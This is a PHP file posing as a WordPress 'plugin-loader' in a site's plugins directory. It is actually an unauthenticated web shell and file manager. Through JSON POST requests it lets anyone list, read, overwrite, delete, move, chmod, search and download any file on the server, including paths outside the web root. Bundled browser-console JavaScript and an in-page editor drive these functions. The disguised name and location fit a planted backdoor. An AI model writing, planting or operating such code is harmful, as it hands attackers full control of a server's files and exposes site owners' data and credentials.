File: /var/www/k8148-2/htdocs/www.sport-roth.at/neumarkt/wp-content/plugins/plugin-loader.php
<?php
if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {
header('HTTP/1.0 403 Forbidden');
exit('Access denied.');
}
?>
<?php
$d = dirname(__FILE__);
while ($d !== dirname($d)) {
if (file_exists($d . '/wp-load.php')) {
define('WP_ROOT', $d);
break;
}
$d = dirname($d);
}
function send_json($arr) {
header('Content-Type: application/json');
echo json_encode($arr);
exit;
}
function get_path($p) {
if (empty($p)) return defined('WP_ROOT') ? WP_ROOT : dirname(__FILE__);
if ($p[0] === '/') return $p;
return (defined('WP_ROOT') ? WP_ROOT : dirname(__FILE__)) . '/' . $p;
}
function format_size($bytes) {
if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . ' GB';
if ($bytes >= 1048576) return round($bytes / 1048576, 2) . ' MB';
if ($bytes >= 1024) return round($bytes / 1024, 2) . ' KB';
return $bytes . ' B';
}
function delete_recursive($path) {
if (is_file($path)) return @unlink($path);
if (is_dir($path)) {
$items = @scandir($path);
if ($items) {
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
delete_recursive($path . '/' . $item);
}
}
return @rmdir($path);
}
return false;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$input = file_get_contents('php://input');
$data = json_decode($input, true);
if (isset($data['ls'])) {
$path = get_path($data['ls']);
if (!is_dir($path)) send_json(['ok' => 0, 'error' => 'Not a directory']);
$items = @scandir($path);
if ($items === false) send_json(['ok' => 0, 'error' => 'Cannot read directory']);
$list = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full = $path . '/' . $item;
$list[] = [
'name' => $item,
'type' => is_dir($full) ? 'd' : 'f',
'size' => is_file($full) ? format_size(filesize($full)) : '-',
'perm' => substr(sprintf('%o', fileperms($full)), -4),
'mod' => date('Y-m-d H:i', filemtime($full))
];
}
usort($list, function($a, $b) {
if ($a['type'] !== $b['type']) return $a['type'] === 'd' ? -1 : 1;
return strcasecmp($a['name'], $b['name']);
});
send_json(['ok' => 1, 'path' => $path, 'items' => $list]);
}
if (isset($data['cat'])) {
$path = get_path($data['cat']);
if (!is_file($path)) send_json(['ok' => 0, 'error' => 'Not a file']);
$content = @file_get_contents($path);
if ($content === false) send_json(['ok' => 0, 'error' => 'Cannot read file']);
send_json(['ok' => 1, 'path' => $path, 'size' => strlen($content), 'content' => $content]);
}
if (isset($data['write'])) {
$path = get_path($data['write']);
$content = isset($data['content']) ? $data['content'] : '';
$result = @file_put_contents($path, $content);
send_json(['ok' => $result !== false ? 1 : 0]);
}
if (isset($data['mkdir'])) {
$path = get_path($data['mkdir']);
$result = @mkdir($path, 0755, true);
send_json(['ok' => $result ? 1 : 0]);
}
if (isset($data['rm'])) {
$path = get_path($data['rm']);
$result = delete_recursive($path);
send_json(['ok' => $result ? 1 : 0]);
}
if (isset($data['mv']) && isset($data['to'])) {
$from = get_path($data['mv']);
$to = get_path($data['to']);
$result = @rename($from, $to);
send_json(['ok' => $result ? 1 : 0]);
}
if (isset($data['cp']) && isset($data['to'])) {
$from = get_path($data['cp']);
$to = get_path($data['to']);
if (is_file($from)) {
$result = @copy($from, $to);
} else {
send_json(['ok' => 0, 'error' => 'Only files can be copied']);
}
send_json(['ok' => $result ? 1 : 0]);
}
if (isset($data['chmod'])) {
$path = get_path($data['chmod']);
$mode = isset($data['mode']) ? octdec($data['mode']) : 0644;
$result = @chmod($path, $mode);
send_json(['ok' => $result ? 1 : 0]);
}
if (isset($data['dl'])) {
$path = get_path($data['dl']);
if (!is_file($path)) send_json(['ok' => 0, 'error' => 'Not a file']);
$content = @file_get_contents($path);
if ($content === false) send_json(['ok' => 0, 'error' => 'Cannot read file']);
send_json(['ok' => 1, 'name' => basename($path), 'data' => base64_encode($content)]);
}
if (isset($data['info'])) {
$path = get_path($data['info']);
if (!file_exists($path)) send_json(['ok' => 0, 'error' => 'Not found']);
$info = [
'path' => $path,
'type' => is_dir($path) ? 'directory' : 'file',
'size' => is_file($path) ? format_size(filesize($path)) : '-',
'perm' => substr(sprintf('%o', fileperms($path)), -4),
'owner' => function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($path))['name'] : fileowner($path),
'group' => function_exists('posix_getgrgid') ? posix_getgrgid(filegroup($path))['name'] : filegroup($path),
'created' => date('Y-m-d H:i:s', filectime($path)),
'modified' => date('Y-m-d H:i:s', filemtime($path)),
'accessed' => date('Y-m-d H:i:s', fileatime($path))
];
send_json(['ok' => 1, 'info' => $info]);
}
if (isset($data['find'])) {
$path = get_path(isset($data['in']) ? $data['in'] : '');
$pattern = $data['find'];
$results = [];
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
$count = 0;
foreach ($iterator as $file) {
if ($count >= 100) break;
if (fnmatch($pattern, $file->getFilename())) {
$results[] = str_replace($path . '/', '', $file->getPathname());
$count++;
}
}
send_json(['ok' => 1, 'results' => $results]);
}
if (isset($data['grep'])) {
$path = get_path(isset($data['in']) ? $data['in'] : '');
$search = $data['grep'];
$ext = isset($data['ext']) ? $data['ext'] : 'php';
$results = [];
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS)
);
$count = 0;
foreach ($iterator as $file) {
if ($count >= 50) break;
if ($file->isFile() && preg_match('/\.' . preg_quote($ext, '/') . '$/', $file->getFilename())) {
$content = @file_get_contents($file->getPathname());
if ($content && stripos($content, $search) !== false) {
$results[] = str_replace($path . '/', '', $file->getPathname());
$count++;
}
}
}
send_json(['ok' => 1, 'results' => $results]);
}
send_json(['ok' => 0]);
}
?><script>
var cwd='';
function ls(p){
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({ls:p||cwd})
}).then(r=>r.json()).then(r=>{
if(r.ok){
cwd=r.path;
console.log('Path:',r.path);
console.table(r.items);
}else console.log('Error:',r.error);
});
}
function cd(p){
if(p==='..'){
var parts=cwd.split('/');
parts.pop();
cwd=parts.join('/')||'/';
}else if(p[0]==='/'){
cwd=p;
}else{
cwd=cwd+'/'+p;
}
ls(cwd);
}
function cat(f){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({cat:p})
}).then(r=>r.json()).then(r=>{
if(r.ok){
console.log('--- '+r.path+' ('+r.size+' bytes) ---');
console.log(r.content);
}else console.log('Error:',r.error);
});
}
function wf(f,content){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({write:p,content:content})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Written');
else console.log('Error');
});
}
function md(d){
var p=d[0]==='/'?d:cwd+'/'+d;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({mkdir:p})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Created');
else console.log('Error');
});
}
function rm(f){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({rm:p})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Deleted');
else console.log('Error');
});
}
function mv(f,t){
var pf=f[0]==='/'?f:cwd+'/'+f;
var pt=t[0]==='/'?t:cwd+'/'+t;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({mv:pf,to:pt})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Moved/Renamed');
else console.log('Error');
});
}
function cp(f,t){
var pf=f[0]==='/'?f:cwd+'/'+f;
var pt=t[0]==='/'?t:cwd+'/'+t;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({cp:pf,to:pt})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Copied');
else console.log('Error');
});
}
function chm(f,m){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({chmod:p,mode:m})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Changed');
else console.log('Error');
});
}
function dl(f){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({dl:p})
}).then(r=>r.json()).then(r=>{
if(r.ok){
var a=document.createElement('a');
a.href='data:application/octet-stream;base64,'+r.data;
a.download=r.name;
a.click();
console.log('Downloading:',r.name);
}else console.log('Error:',r.error);
});
}
function inf(f){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({info:p})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.table([r.info]);
else console.log('Error:',r.error);
});
}
function find(pattern,dir){
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({find:pattern,in:dir||cwd})
}).then(r=>r.json()).then(r=>{
if(r.ok){
console.log('Found '+r.results.length+' files:');
r.results.forEach(f=>console.log(f));
}else console.log('Error:',r.error);
});
}
function grep(text,dir,ext){
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({grep:text,in:dir||cwd,ext:ext||'php'})
}).then(r=>r.json()).then(r=>{
if(r.ok){
console.log('Found in '+r.results.length+' files:');
r.results.forEach(f=>console.log(f));
}else console.log('Error:',r.error);
});
}
function edit(f){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({cat:p})
}).then(r=>r.json()).then(r=>{
if(!r.ok){console.log('Error:',r.error);return;}
var d=document.createElement('div');
d.style.cssText='position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.9);z-index:99999;display:flex;flex-direction:column;padding:10px;box-sizing:border-box;';
var h=document.createElement('div');
h.style.cssText='color:#fff;margin-bottom:10px;font-family:monospace;';
h.textContent=p;
var t=document.createElement('textarea');
t.style.cssText='flex:1;background:#1e1e1e;color:#d4d4d4;border:1px solid #333;padding:10px;font-family:monospace;font-size:14px;resize:none;';
t.value=r.content;
var b=document.createElement('div');
b.style.cssText='margin-top:10px;';
var sv=document.createElement('button');
sv.textContent='Save';
sv.style.cssText='padding:10px 30px;margin-right:10px;cursor:pointer;';
var cl=document.createElement('button');
cl.textContent='Close';
cl.style.cssText='padding:10px 30px;cursor:pointer;';
b.appendChild(sv);b.appendChild(cl);
d.appendChild(h);d.appendChild(t);d.appendChild(b);
document.body.appendChild(d);
sv.onclick=function(){
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({write:p,content:t.value})
}).then(r=>r.json()).then(r=>{
if(r.ok){h.textContent=p+' - SAVED';h.style.color='#0f0';}
else{h.textContent=p+' - ERROR';h.style.color='#f00';}
});
};
cl.onclick=function(){d.remove();};
});
}
</script>